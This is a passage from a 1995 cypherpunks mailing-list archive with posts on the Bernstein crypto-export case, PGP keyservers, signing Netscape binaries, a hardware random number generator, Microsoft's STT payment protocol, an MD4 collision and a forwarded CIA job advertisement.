|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHGNYlQXJENzYr45AQH8AgQArY71q84bEuPsVRa4Po5ZcHLMoV7yFszX
tZBqokbZ0F9ZFh7USHyynlx/J82yzBRdks680p5j6lXbQ4wbr5xSZQNDEzS+FVNq
+IObzc+c1qv1nSvb6gcJP6wRNfEMk64bSqprG8sYcN2edD5ksDHFECOGCdxnN4Iy
TWT/rpwOYr0=
=UsEv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 3 Oct 95 07:53:59 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*) (fwd)
Message-ID: <199510031453.PAA12535@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, Oct 3, 1995, Business Employment Ad.


1984 Sarajevo, Olympics; 1995 Sarajevo, Battleground


Every day in our world, new threats, new challenges, new
missions emerge. The people of the Central Intelligence
Agency are dedicated to meeting the missions of the day,
providing information and resources that aid decision
makers in solving the problems and responding to issues
that affect us all.

You can play an integral role in our mission, while
advancing your own career.

The Central Intelligence Agency is currently seeking
professional men and women who will be comfortable living
and working abroad. These positions entail extended
overseas assignments in various parts of the world.
Previous service in long-term foreign assignments, in
either business or government positions, is a definite
advantage.

Changing international economic, political and social
conditions make a broad range of professional backgrounds
suitable for these positions. Your experience may be in
economics finance, marketing, or general business.
Scientific or technical experience in engineering
disciplines, physical sclences, biological sciences, or
any area of high technology research and development is
of particular interest.

These overseas positions require more than appropriate
professional experience. Successful candidates must also
demonstrate a high degree of individual initiative, self
reliance and personal integrity. Naturally, the ability
to speak or learn a foreign language is expected along
with above average communications skills, both oral and
written. A Bachelor's degree is a minimum requirement.
Advanced degree or military service is a plus.

All applicants must successfully complete a thorough
medical and psychiatric exam, a polygraph interview, and
an extensive background investigation. U.S. citizenship,
or eligibility for citizenship, is required. CIA
encourages applications from men and women of every
racial and ethnic background from all parts of the nation
-- we represent America and we want to be representative
of America.

We will respond within 30 days if your application is
evaluated as being of interest.

Central Intelligence Agency
Dept. 15FS
P.O. Box 12002
Arlington, VA 22209-8727
Fax: 703-482-7395

CIA is an equal opportunity employer

[CIA eagle-headed all-points shield logo]

[Motto] Meet the Challenge of a Changing World

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 2 Oct 95 23:12:37 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
In-Reply-To: <199510030306.XAA24030@thor.cs.umass.edu>
Message-ID: <199510030504.AA51368@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> I don't know about everyone else, but a T-shirt seems a very 
>> small reward for uncovering a "hole" in the encryption 
>> algorithm of Microsoft products.  
>
>I don't know about anyone else, but helping to protect the confidential data 
>of millions of users around the world seems a very large reward for
>uncovering a hole in the encryption algorithms of M$ products.

My reward would be the satisfaction of showing M$ code to be the substandard,
elitist, money grubbing and dictatorial junk it is. The size of their payroll
should not be the reason they want to be able to dictate what programs Joe
Deskset runs on the internet.

I can see the progression where their CC transportation software is coupled
with a Registration Wizard to automatically purchase any software on your HD
that they have no record of you purchasing... "just in case and as a service
on your behalf".

Mark
The above opinions are rumoured to be my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 3 Oct 95 16:30:34 PDT
To: cypherpunks-announce@toad.com, gnu
Subject: Oct 20th SF C'punks meeting: at the ITAR Constitutional trial court
Message-ID: <9510032330.AA11251@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We're having a "Cypherpunks Dress-Up Day" on Friday, October 20th.
Meet at the Federal Building in San Francisco, 450 Golden Gate Avenue,
at 10:15AM.  Hey, I've seen Tim May in a suit once, why not again?

The first "oral arguments" in the Bernstein crypto export case will
happen there, starting at 10:30, in Judge Patel's courtroom upstairs.
We've been fedexing legalese back and forth for months; now we get to
explain the case in person.  You can meet our intrepid lawyers, who
are slaving away without pay, in durance vile, to protect our rights!
Shake hands with an NSA lawyer specially flown in for the occasion!
Meet some local journalists!  And watch the wheels of justice grindin'
as the judge first explores our case.  We will follow the hearing with
a group lunch at Max's Opera Plaza, a block away, and break up at
12:30 or 1PM.

In this case, Dan Bernstein, ex-grad-student from UC Berkeley, is
suing the State Department, NSA, and other agencies, with help from
the EFF.  Our main argument is that the export controls on crypto
software are a "prior restraint on publication" which is
unconstitutional under the First Amendment unless handled very
delicately by a court (not just by an agency acting on its own).
These agencies restrained Dan's ability to publish a paper, as well as
source code, for the crypto algorithm that he invented.  There are
additional arguments along the lines that the State Department and NSA
take a lot more liberties during the export process than their own
regulations and laws really permit.  Full background and details on
the case are in the EFF Web/FTP archives at:
    http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case.

Like Phil Karn's case, this lawsuit really has the potential to outlaw
the whole NSA crypto export scam.  We could make your right to publish
and export crypto software as well-protected by the courts as your
right to publish and export books.  Of course, the government would
appeal any such decision, and it will take years and probably an
eventual Supreme Court decision to make it stick.  But you can be
there at the very beginning!

Please make a positive impression on the judge.  Show her -- by
showing up -- that this case matters to more people than just the
plaintiff and defendant.  That how it gets decided will make a
difference to society.  That the public and the press are watching,
and really do care that it gets handled well.  We'll have to be quiet
and orderly while we're in the courthouse.  There will be no questions
from the audience (that's us), but the session will be tape-recorded,
and you can take notes if you like.

The judge is Marilyn Hall Patel, who used to be on the board of
directors of the ACLU.  I haven't met her, but I hear that she's not
afraid to tell the government where to stuff it, when they deserve it.
Our lawyers met with her once before, but this will be your first
chance to meet the judge in person.

The particular issue in front of the judge on the 20th is whether the
case should be thrown out.  The government is arguing that it should.
It's a mess of legal details about whether the Judicial Branch has the
right to decide questions like this, and over whether we have really
properly claimed a Constitutional rights violation.  It will teach
most c'punks something about how the courts work, and how the NSA and
State Dept use bureaucratic tricks to avoid facing the real issues.
We have managed to drag in some of these issues, like whether there is
sufficient "expression" in software that the First Amendment should
protect publishers of software.  It's possible, but unlikely, that the
judge will decide then-and-there.  We will get some clues to how
she is leaning, based on her questions and comments.  Her written
decision will come out some days or weeks later.

Don't bring any interesting devices unless you're willing to check
them with the lobby guards for the duration.  They seem to want to
hold onto guns, "munitions", and even small pocketknives, before
they'll let you go upstairs to the courtrooms.

So, here's your excuse to put on a nice costume, take an early lunch,
and pay a call on the inner sanctum of our civil rights.  See you there!

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 3 Oct 95 13:33:03 PDT
To: cypherpunks@toad.com
Subject: (fwd) ETO TENDER
Message-ID: <v02120d04ac974634ca5d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 3 Oct 95 09:14:04 -0400
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
X-Minuet-Version: Minuet1.0_Beta_14.1
Reply-To: <JENKINS@fox.nstn.ca>
X-Popmail-Charset: English
To: www-buyinfo@allegra.att.com, untpdc@urgento.gse.rmit.EDU.AU
Subject: ETO TENDER

For List:

Ref UN Trade Point
------------------
Attached is an alternative to the use of electronic brokers who
charge per transaction. This sevice is free and very well organized.

Check out the UNCTAD Trade Point Web site at:
 http://www.unicc.org/untpcd

Gordon Jenkins

Emailjenkins@fox.nstn.ca
URL : http://www.infop.com/karoma

----- Forwarded message begins here -----
From: UNTPDC  <untpdc@urgento.gse.rmit.EDU.AU>
Thu, 28 Sep 1995 11:47:45 +1000 (EST)
To: ETO gateway <etotrade@wtm.com>
Subject: ETO TENDER

TO      :       ETO ASSOCIATES - TRADE POINTS
FROM    :       Carlos Moreira
                Head United Nations Trade Point Development Centre
                UNCTAD

Subject :       ETO Tenders

Dear ETO users,

we are introducing a new service to the ETO systems which relates
to international tenders. The service ETO Tender is also free and
we will disseminate the information via email. The tender data is
always free text so we will not codify the information. Please
send us your national tenders so we can increase the number of
tenders on-line.

With my best regards

Carlos Moreira



ETO TENDER
Japan
FOREIGN GOVERNMENT TENDER

Description:
S16  CONSTRUCTION

Comments:


PRODUCT DATA

A.  INDUSTRY SECTOR CODE:
B.  DETAILED PRODUCT DESCRIPTION:  CONSTRUCTION TITLE:
    PRELIMINARY DESIGN OF THE KOYA JUNCTION BRIDGES; SUMMARY:
    PRELIMINARY DESIGN OF BRIDGES FOR GENERAL AND EXCLUSIVE USE
    AT THE KOYA JUNCTION (TENTATIVE NAME); DELIVERY DATE:  MARCH
    25, 1996.
C.  PRODUCT SPECIFICATIONS/TECHNICAL DATA:  N/A (NOT AVAILABLE)
D.  QUANTITY:  N/A
E.  U.S. DOLLAR VALUE:  N/A
F.  OTHER INFORMATION:  N/A

RESPONSE DATA

A.  RESPONSE LANGUAGE:  JAPANESE.
B.  BEST WAY TO RESPOND:  LETTER.
C.  FROM MANUFACTURERS ONLY:  N/A
D.  INFORMATION DESIRED FROM U.S. FIRM:  N/A
E.  PRIMARY BUYING FACTOR:  N/A
F.  OTHER INFORMATION:  INTERESTED FIRMS MUST SUBMIT THEIR
    EXPRESSION OF INTEREST IN THIS DESIGN COMPETITION BY 17:00
    PM, SEP. 29.  THE PROSPECTUS MUST BE OBTAINED DIRECTLY FROM
    THE PROCURING AGENCY, NOT FROM U.S. EMBASSY.

TENDER LEAD DATA

A.  ISSUING AGENCY:  METROPOLITAN NATIONAL HIGHWAY WORK OFFICE,
    KANTO REGIONAL CONSTRUCTION BUREAU
B.  FINANCING AGENCY:  SAME AS ABOVE.
C.  PRICE OF PROSPECTUS:  N/A
D.  OBTAIN PROSPECTUS BY:  OCT. 23, 1995.
E.  TENDER NUMBER REQUIRED IN ALL COMMUNICATIONS:  N/A
F.  PERFORMANCE BONDS REQUIRED:  N/A
G.  CLOSED PROCUREMENT PROCEDURE:  NO.
H.  BIDDING PROCEDURES:  SELECTIVE TENDER.
I.  PROPOSAL DEADLINE:  17:00 PM, OCT. 24, 1995.
J.  OTHER INFORMATION:  "KENSETSU KOGYO SHIMBUN":  9/19/95.
    CRITERIA FOR QUALIFICATION, SELECTION, AND SCREENING:  1)
    QUALIFICATION CRITERIA FOR PARTICIPANTS:  FIRMS PRE-
    QUALIFIED FOR OPEN COMPETITIVE OR SELECTIVE BIDDING ON CIVIL
    ENGINEERING CONSULTING WORK BY THE KANTO REGIONAL
    CONSTRUCTION BUREAU; 2) SELECTION CRITERIA FOR PARTICIPANTS:
    A) RECORDS OF SAME TYPE OR SIMILAR WORK; B) CONDITIONS OF
    REGISTERED BUSINESS; C) AVAILABILITY OF SPECIALIZED
    ENGINEERS; D) QUALIFICATION, BACKGROUNDS, AND WORK INVOLVED
    OF ASSIGNED ENGINEERS; E) PLAN FOR SUBCONTRACTING; AND F)
    RELATIONS WITH CONTRACTORS; AND 3) SCREENING CRITERIA FOR
    DESIGN PROPOSALS:  A) HISTORY OF COMPANY'S BUSINESS:
    RECORDS OF SAME TYPE OR SIMILAR WORK; AVAILABILITY OF
    SPECIALIZED ENGINEERS; B) EXPERIENCE AND ABILITY OF
    ENGINEERS:  QUALIFICATION, EXPERIENCE, WORK INVOLVED, AND
    WORK RECORDS OF ASSIGNED ENGINEERS; AND C) PLAN OF ACTION
    AND ITS METHOD:  LEVEL OF UNDERSTANDING OF PROSPECTUS;
    APPROPRIATENESS OF PLAN OF ACTION; ADEQUACY, ORIGINALITY,
    AND FEASIBILITY OF PROPOSAL; AND APPROPRIATENESS OF PROCESS
    AND MANPOWER PLAN.

POST REMARKS:


POST CONTACT/PREPARED BY:  HAOMORI
APPROVED BY:  GTAEVS

CONTACT:
          FIRST PLANNING AND DESIGN DIVISION, METROPOLITAN
          NATIONAL HIGHWAY WORK OFFICE, KANTO REGIONAL
          CONSTRUCTION BUREAU, MINISTRY OF CONSTRUCTION, 86
          TAKEGAHANA, MATSUDO-SHI, CHIBA-KEN 271, JAPAN

PHONE:    81/473/62-4115

FAX:      N/A

Please send a copy of your response to:
          COMMERCIAL OFFICER (FCS TOP)
          AMERICAN EMBASSY
          TOKYO
          UNIT 45004
          APO AP 96337

          Refer to TC606
------ Forwarded message ends here ------
 --
 GORD JENKINS
e maik  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938

--- end forwarded text

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Tue, 3 Oct 95 14:31:31 PDT
To: cypherpunks@toad.com
Subject: Keyserver keyrings
Message-ID: <g2ZecD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The public keyrings at MIT and Uni-Hamburg haven't been updated since August.
Does anyone know why?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHGqnN74r4kaz3mVAQEdjwP8DnOUAYZa4PqtiMprEaRtwnO2d2RvI2KW
jPgeL/99bv/8DwlmbpE2+SYv6AXw4E+MQjPVSbxnpFlH/YuZaGEnJ4mMI6xnvD5X
/vFaGI9B82YJ9aLx2MD8Lqu82dCPhk91ZxriyhPkAwfPhe8DfihPwtWaohTDygx5
Uwcifpl49eY=
=9xkB
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 3 Oct 95 16:13:31 PDT
To: cypherpunks@toad.com
Subject: About that simple hardware RNG
Message-ID: <951003.173054.7O1.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The idea:  noise from an avalanching diode is applied to the input of an
8 bit shift register.  The SR is clocked at some fairly high sampling
rate.  The 8 bits are made available on the printer port.

The questions: Does the RNG need to accumulate bits, or can it simply
present the most recent 8 random bits from the diode?  (I imagine
there'll have to be a protection against reading again before the SR has
flushed)  How fast can you sample an avalanching diode?  (how many
bits/second can I expect to harvest?)  Would a less-than-quartz-accurate
sampling rate be acceptable?  (555s, resistors and caps are cheaper than
oscillator modules)  Or would a device driver to supply the sampling
frequency be acceptable?  What if someone (Mallet?) hacks the driver?
(the driver is admittedly less portable)

One last question... what aesthetics apply here?  Would cypherpunks
abide a largish box, or shun anything larger than a typical dongle?
(smaller usually equals more expensive)
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHHAPRvikii9febJAQHkIgQApvQh/Lc+5lLpVjJy50TDg6CjIETwmS1p
Z+CxMmNiNCRlu8gdbIPiIuT7vrnGaOeuFF4OEzWKzUhokMJ7jNDaRZvgIX8DaNm9
R8+LtCqYmBASHlmq5iHHhFxESwsXCK4ulnWZuMVju4eEF6DNrZqHmSHChr/hQ2L6
df+s+KJ9lWY=
=vosV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <andrewr@vironix.co.za>
Date: Tue, 3 Oct 95 08:40:03 PDT
To: aba@dcs.ex.ac.uk
Subject: STT Authentication
Message-ID: <9510031738.aa13031@herman.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Hi All

Ramblings from a disturbed mind...

I've had a look at Microsoft's Secure Transaction Technology (STT) protocol.
The purchase order/authorization/receipt phase is authenticated using the
card holder's credential ("cred", in MS speak). The credential is similar to
a certificate except the binding is between a credit card and a public key,
rather than between an identity and a public key. What interests me is the
procedure for issuing cred's to cardholders. If I'm reading the spec right,
this is done in response to a "Cardholder Credential Request" message which
includes card details and the public keys to be associated with the card.
This data, along with a SHA hash of the data, is encrypted and sent to the
issuing bank, which then responds with a "Cardholder Credential Response"
containing the signature and key-exchange creds, also encrypted. However
there does not appear to be any authentication whatsoever on the credential
request message, presumably becuase the cardholder does not have a published
public key at the time when this message is issued. It may be that
authentication is out-of-band - e.g. the bank may phone the registered owner
of the card # before issuing a cred response message - but there is no
mention of this in the spec. If there isn't OOB authentication, then this is
a major hole in the protocol, since anyone who knew a credit card no, name
and expiry date could request a cred for that card, and then go shopping...

If someone will just tell me what I'm missing (because this is too obviously
f'd up for even Uncle Bill) then I'll go sit on top of my mountain again and
hum softly to myself.

Andrew

BTW, same apears to be true for Merchant creds.
________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key: ftp.vironix.co.za/PGP-keys/AndrewRoos (or key servers)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 2 Oct 95 23:56:49 PDT
To: rsalz@osf.org (Rich Salz)
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
In-Reply-To: <9510010616.AA06860@sulphur.osf.org>
Message-ID: <199510030655.AA59891@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>SAIC ran the Center for Seismic Studies in Arlington, VA.  Rick Adams,
>co-founder of UUnet, made one of their machines, seismo, the UUCP hub of the
>world for a couple of years.

I wonder how much intel that gained them.

Mark
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 3 Oct 95 10:20:40 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <9510031719.AA12326@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
 > In article <9510030248.AA08909@hplyot.obspm.fr>, dl@hplyot.obspm.fr (Laurent Demailly) writes:
 > > I asked monthes ago netscape folks to make md5sum and/or PGP digital
 > > signatures (preferably md5sum of each files, this in a file, itself
 > > pgp signed) of the binaries available on their page and on relevant
 > > newsgroup to reduce possibility of tempering.
[...]
 >   I've been thinking about this recently for obvious reasons.  My concern
 > is that if someone can attack your download of netscape, they could also
 > attack your download of the program that validates netscape.  Is there
 > really any way out of this one?
I have *already* downloaded, checked,... pgp years ago, and I did
multiplatforms cross tests,... so all I need is a pgp signed stuff
(obviously i need your (netscape's) pgp public key too, but I think
that a "massive" distribution, that is : mail on a couple of mailing
lists, your site, newsgroup, eventually adding fingerprint by phone
for the paranoid, would ensure that your key is indeed your key (it
can probably take few weeks before it's "sure" (you'll get feedback if
key have been tempered somehow)
Or easiest even manage that your key is signed by some well known folk
(PhilZ,...))

See my point ?

ps :imo the later your start, the harder it'll be to be "sure" of
something. (reputation of a key takes some weeks/monthes,...)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

$400 million in gold Legion of Doom mururoa assassination break Peking
Delta Force




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 3 Oct 95 15:59:08 PDT
To: jgrubs@left.webcasters.com
Subject: Re: Keyserver keyrings
In-Reply-To: <g2ZecD1w165w@left.webcasters.com>
Message-ID: <199510032302.TAA12302@homeport.org>
MIME-Version: 1.0
Content-Type: text


| The public keyrings at MIT and Uni-Hamburg haven't been updated since August.
| Does anyone know why?

	There are two servers at MIT, Brian LaMachia's (on swiss.ai?)
and the one Derek set up on toxicwaste.  The toxicwaste one is
probably not being maintained becuase Derek has off and gotten a job,
and theres no one to maintain it.



Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@wmono.remailer (Anonymous)
Date: Tue, 3 Oct 95 17:04:06 PDT
To: cypherpunks@toad.com
Subject: meeting on 20th
Message-ID: <199510040004.TAA08747@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


could someone that goes make a transcript of the hearing???
like to hear it but too far away!!

10x.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Tue, 3 Oct 95 19:27:27 PDT
To: cypherpunks@toad.com
Subject: Re: Keyserver keyrings
In-Reply-To: <199510040126.VAA11270@toxicwaste.media.mit.edu>
Message-ID: <199510040222.TAA02828@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


According to 'Derek Atkins':
 
> The name pgp.mit.edu is now
> pointing at another machine (which I do not maintain).  For access to
> the keyring, send email to pgp-public-keys@pgp.mit.edu -- that is the
> supported method of access.

does anybody out there maintain a current keyring that can be grabbed
via anon ftp instead? It seems like a waste of time for hundreds of
users to continually add updates to their own keyrings when the whole
keyserver ring can be picked up at one time, updates and all? ftp is
much more convenient than stringing together multiple sections received
by e-mail.

thx.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Johnson <rickj@microsoft.com>
Date: Tue, 3 Oct 95 21:16:57 PDT
To: www-security@ns2.rutgers.edu
Subject: Comments on STT Spec Implementation Details
Message-ID: <9510040519.AA05397@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi All -

Last week our team published jointly with Visa the STT specification.  
Since then, we've received some comments that the wire formats and 
protocols section for STT have not been complete enough for developers 
to implement.

We're very interested in feedback and specifics on this.  We worked to 
keep _only_ the detail we felt required to implement STT -- the 
language is intentionally terse.  However, it is in everyone's best 
interest that the STT spec is completely understood and implementable.

We want your participation in this.  We've set up an alias direct to 
our team to respond to your comments:

	stt@microsoft.com

Non-technical flames direct to:

Rick

 - aka -

Rick Johnson
rickj@microsoft.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 3 Oct 95 20:06:30 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <199510040218.MAA04820@sweeney.cs.monash.edu.au>
Message-ID: <199510040300.UAA05650@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> If you mention all over the place that the program is PGP-signed
> to foil {cr,h}ackers and viruses (*), chances are a lot of people will
> ask their one colleague or friend that does know PGP to verify it for them.

	Yeah, just imagine the PR possibilities!

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 3 Oct 95 17:29:31 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Strong authentication for Netscape distributions
In-Reply-To: <9510031403.ZM151@tofuhut>
Message-ID: <9510040026.AA18012@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: Jeff Weinstein <jsw@netscape.com>
    Date: Tue, 3 Oct 1995 14:03:28 -0700
    Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!) 

    . . .

      Yes, I get the idea about spewing the signed hashes everywhere.  The
    problem I have is with the user of PGP.  That will help cypherpunks,
    but does absolutely nothing for most of our millions of users, who
    have no idea what PGP is.  Perhaps its enough to assume that if anyone
    is tampering with the distribution, some cypherpunk will stumble across
    it...

I suspect that most of these millions don't know about md5 or much of
anything in the way of strong authentication.  However, if you provide
any sure-fire mechanism by which someone could detect that the
distribution has been tampered with, it would be an improvement over
not having any.  If someone does happen to notice tampering and send
mail to cypherpunks about it, I'd guess that there's a good chance it
would be reported in major publications shortly thereafter.

You might want to indirect through BETSI . . . .

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHHUeZNR+/jb2ZlNAQHVCQP8CBb5c/0nX41awTf/kt+gGODu4qLcJVI8
rc604+rdr0YUFPVTStwXdUCg7gKgUTOC8werBPK5Dgyse/8u1jczU4Czub9Cd693
EfUW7o2oHN5/3x9E0Yn1rJD+ffwuGC+lf1EMBJMHsTwJzbPmy0FJPfyfyDlvWrDD
OQDsJ5DbOHU=
=s/t0
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 3 Oct 95 21:00:14 PDT
To: cypherpunks@toad.com
Subject: The Evolution of  Cooperation (Towards a mathematical theory of reputation?)
Message-ID: <ac97b7d503021004c5f9@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I highly recommend Axelrod's short book, The Evolution of  Cooperation, for
those (like me) who find it hard to think clearly about trust issues. You
have probably heard about prisoner's dilemma, tit-for-tat etc. Axelrod is a
very early worker in this field. He set up a tournament of programmed bugs
that competed with each other in an artificial environment. They could
survive only by cooperation with other bugs. The could also cheat.

Axelrod does not use the term "reputation" but it what one bug gains or
looses as it interacts with other bugs in iterated encounters.

I read the book about two years ago. Only last night did I realize that
those ideas helped me think about the MITM threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 3 Oct 95 20:57:05 PDT
To: cypherpunks@toad.com
Subject: MD4 collision
Message-ID: <ac97c47804021004bddb@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Hans Dobbertin in Germany has found two messages to which
MD4 assigns the same hash.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Tue, 3 Oct 95 21:06:50 PDT
To: sbryan@maroon.tc.umn.edu (Steve Bryan)
Subject: Re: macworld crypto articles
In-Reply-To: <v02130502ac8f4f64de57@[204.221.10.130]>
Message-ID: <9510040358.AA09395@doom>
MIME-Version: 1.0
Content-Type: text/plain



> PGP is probably too unweildy for the non-hobbyist to comfortably use. I=
>  don't know if anyone else has suggested it but I'd strongly encourage=
>  Intuit to make CryptDisk for the Mac easily available. I use it to maintain=
>  an encrypted partition for my financial data and the user interface is=
>  quite simple. I believe the DOS equivalent is SecureDisk.

I think that it's a good idea to make users aware of the options.  I
haven't used CryptDisk or SecureDisk myself, but I'll check them both
out.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 3 Oct 95 18:23:46 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510031403.ZM151@tofuhut>
Message-ID: <199510040123.VAA11236@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   Yes, I get the idea about spewing the signed hashes everywhere.  The
> problem I have is with the user of PGP.  That will help cypherpunks,
> but does absolutely nothing for most of our millions of users, who
> have no idea what PGP is.  Perhaps its enough to assume that if anyone
> is tampering with the distribution, some cypherpunk will stumble across
> it...

If nothing else, Jeff, it will expose those "millions of users, who
have no idea what PGP is" to PGP.  And, hopefully, some of those
"millions of users" might even take the time to grab PGP and take a
look at that, too.

In other words, there is nothing to lose (except a little bit of time
and effort, and a small amount of storage space) and there is a heck
of a lot to gain by including PGP signatures.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 3 Oct 95 18:26:31 PDT
To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Subject: Re: Keyserver keyrings
In-Reply-To: <g2ZecD1w165w@left.webcasters.com>
Message-ID: <199510040126.VAA11270@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The public keyrings at MIT and Uni-Hamburg haven't been updated since August.
> Does anyone know why?

Umm.. To which keyring are you referring at MIT?  If you mean the ring
at ftp://toxicwaste.mit.edu/pub/keys, then that is because toxicwaste
is no longer the pgp.mit.edu keyserver.  The name pgp.mit.edu is now
pointing at another machine (which I do not maintain).  For access to
the keyring, send email to pgp-public-keys@pgp.mit.edu -- that is the
supported method of access.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
